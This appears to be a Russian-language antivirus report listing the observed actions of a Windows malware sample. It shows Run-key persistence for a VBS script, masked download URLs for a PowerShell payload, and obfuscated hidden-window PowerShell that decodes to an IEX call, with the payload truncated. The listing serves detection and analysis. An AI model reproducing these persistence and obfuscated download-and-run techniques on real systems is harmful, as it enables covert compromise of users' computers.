Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%LOCALAPPDATA%\Microsoft\lyt.vbs '
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\lyt.vbs"
- C:\users\public\lyt.vbs
- %LOCALAPPDATA%\microsoft\lyt.vbs
- http://ba####nksale.com/grace/luck/Payment.ps1
- http://ba####nksale.com/don/code/Attack.jpg
- DNS ASK ba####nksale.com
- DNS ASK google.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal cP5 $c145;$xAlxonjpefCIek=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%LOCALAPPDATA%\Microsoft\lyt.vbs '' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "C:\Users\Public\lyt.vbs " "%LOCALAPPDATA%\Microsoft\" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal cP5 $c145;$xAlxonjpefCIek=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%LOCALAPPDATA%\Microsoft\lyt.vbs '
- '<SYSTEM32>\cmd.exe' /c copy "C:\Users\Public\lyt.vbs " "%LOCALAPPDATA%\Microsoft\" /Y